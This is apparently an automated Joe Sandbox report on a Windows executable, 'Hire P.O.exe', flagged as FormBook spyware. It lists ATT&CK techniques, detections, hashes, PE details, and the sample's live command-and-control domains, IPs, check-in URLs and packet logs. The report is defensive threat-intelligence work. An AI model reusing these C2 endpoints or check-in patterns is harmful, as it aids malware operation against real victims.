                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Figure: Behavior Graph. ID: 1556306; Sample: Hire P.O.exe; Startdate: 15/11/2024; Architecture: WINDOWS; Score: 100. Process chain: Hire P.O.exe started Hire P.O.exe, which injected zKwhguHavy.exe, which started fc.exe, which injected zKwhguHavy.exe and started firefox.exe.]

                Source | Detection | Scanner | Label | Link
                Hire P.O.exe | 58% | ReversingLabs | ByteCode-MSIL.Ransomware.RedLine |
                Hire P.O.exe | 100% | Avira | HEUR/AGEN.1311126 |
                Hire P.O.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.omnibizlux.biz/jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg=0%Avira URL Cloudsafe
                http://www.vibixx.site0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E=0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.tesetturhanzade.xyz/ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vibixx.site
                162.0.211.143
                truetrue
                  unknown
                  zz67x.top
                  38.47.232.194
                  truetrue
                    unknown
                    www.sonoscan.org
                    13.248.169.48
                    truefalse
                      high
                      www.deeplungatlas.org
                      194.9.94.86
                      truetrue
                        unknown
                        ultrawin23.shop
                        170.39.213.43
                        truetrue
                          unknown
                          natroredirect.natrocdn.com
                          85.159.66.93
                          truefalse
                            high
                            kantinestoel.online
                            91.184.0.200
                            truetrue
                              unknown
                              www.omnibizlux.biz
                              167.172.133.32
                              truefalse
                                high
                                www.ultrawin23.shop
                                unknown
                                unknownfalse
                                  unknown
                                  www.zz67x.top
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.tangible.online
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.tesetturhanzade.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.kantinestoel.online
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
Name    Source    Malicious    Antivirus Detection    Reputation
IP    Domain    Country    Flag    ASN    ASN Name    Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556306
Start date and time: 2024-11-15 09:29:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Hire P.O.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@9/8
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 96%
                                                          • Number of executed functions: 198
                                                          • Number of non-executed functions: 288
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target zKwhguHavy.exe, PID 2076 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • VT rate limit hit for: Hire P.O.exe
                                                          No simulations
Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
                                                          RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                          • 76.223.54.146
                                                          https://www.payceconsultings.com/#choonghoon.kim@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                          • 76.76.21.98
                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                          • 18.244.18.27
                                                          xd.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 18.175.16.182
                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                          • 34.249.145.219
                                                          xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 44.234.6.132
                                                          xd.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 54.126.105.91
                                                          HOSTNETNLOrder.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          DHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          https://polidos.com/Get hashmaliciousUnknownBrowse
                                                          • 91.184.0.111
                                                          CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          CYTAT.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\Hire P.O.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                          MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                          SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                          SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                          SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                          Malicious:true
                                                          Reputation:moderate, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                          Process:C:\Windows\SysWOW64\fc.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1209935793793442
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                          MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                          SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                          SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                          SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.73608371343722
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Hire P.O.exe
                                                          File size:807'936 bytes
                                                          MD5:838e3079ecea7cbf8d6909abe0d6f393
                                                          SHA1:0dbddc8f8935d4c464d77e418bee2ff61624d7e1
                                                          SHA256:7e88c41f8c326c85f54f8df37579e2b846bb34fc821cc14e99c0bf43c4a8fd8a
                                                          SHA512:ca70d26a6f87c90dc9bc9d4184f12245be12715ba94bf45917897bb72607d03425d40423a8a62c73c4fc5abc1f1c07e31c552b5873726cc333d67382069f9f08
                                                          SSDEEP:24576:BgwS6Eni57eSQ8nbectxgo9wpGFhcQCJV:SbcVe+bztxgIGG0r
                                                          TLSH:9805F10076A9AF22E6BA5BF40431D27007B9BE9EA430E30E5ED49CDF3D12B855E45763
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g..............0..J...........g... ........@.. ....................................@................................
                                                          Icon Hash:90cececece8e8eb0
                                                          Entrypoint:0x4c67fe
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x673599B7 [Thu Nov 14 06:33:27 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc67aa | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5a4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc2b64 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc4804 | 0xc4a00 | fb5ed5476c839945f882eb60293aa3c6 | False | 0.8720448585505404 | data | 7.743367974972074 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc8000 | 0x5a4 | 0x600 | c6b711292b2d652e69c9df15eaa8f3af | False | 0.419921875 | data | 4.070528627940514 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | b361fb24bd03d3c7081e2f19bc550a51 | False | 0.041015625 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc8090 | 0x314 | data | | | 0.434010152284264
RT_MANIFEST | 0xc83b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-15T09:32:00.628951+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49981 | 85.159.66.93 | 80 | TCP
2024-11-15T09:32:24.347747+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49985 | 91.184.0.200 | 80 | TCP
2024-11-15T09:32:38.015857+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49989 | 194.9.94.86 | 80 | TCP
2024-11-15T09:32:51.741328+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49993 | 170.39.213.43 | 80 | TCP
2024-11-15T09:33:05.157377+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49997 | 13.248.169.48 | 80 | TCP
2024-11-15T09:33:19.457187+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 50001 | 38.47.232.194 | 80 | TCP
2024-11-15T09:33:32.980413+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 50005 | 167.172.133.32 | 80 | TCP
2024-11-15T09:33:46.389247+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 50009 | 162.0.211.143 | 80 | TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 15, 2024 09:32:30.335912943 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335938931 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335952044 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335995913 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:30.336018085 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.336031914 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.336072922 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:30.456832886 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.457068920 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:31.019727945 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.039891005 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.044879913 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.045074940 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.064378977 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.069341898 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894706011 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894757986 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894783974 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894798994 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894814968 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894829988 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894988060 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:33.015243053 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:33.015325069 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:33.566557884 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.585386038 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.590928078 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:34.591099977 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.602211952 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.607233047 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:34.607266903 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472021103 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472040892 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472057104 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472071886 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472088099 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472104073 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472374916 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:35.609214067 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.609529018 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:36.113459110 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.180027008 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.185853004 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:37.185934067 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.205796003 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.210901976 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015513897 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015625954 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015640020 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015655041 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015671015 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015687943 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015856981 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.015893936 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.136569977 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.136981010 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.138170004 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.143054962 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:43.510993004 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.515923977 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:43.516057014 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.527249098 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.532520056 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.114614964 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.115288973 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.115377903 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:45.035289049 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.053757906 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.058888912 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.058979988 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.072084904 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.077100992 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.651662111 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.652662039 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.652717113 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:47.582192898 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.600877047 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.605962038 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:48.606103897 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.616911888 CET4999280192.168.2.11170.39.213.43
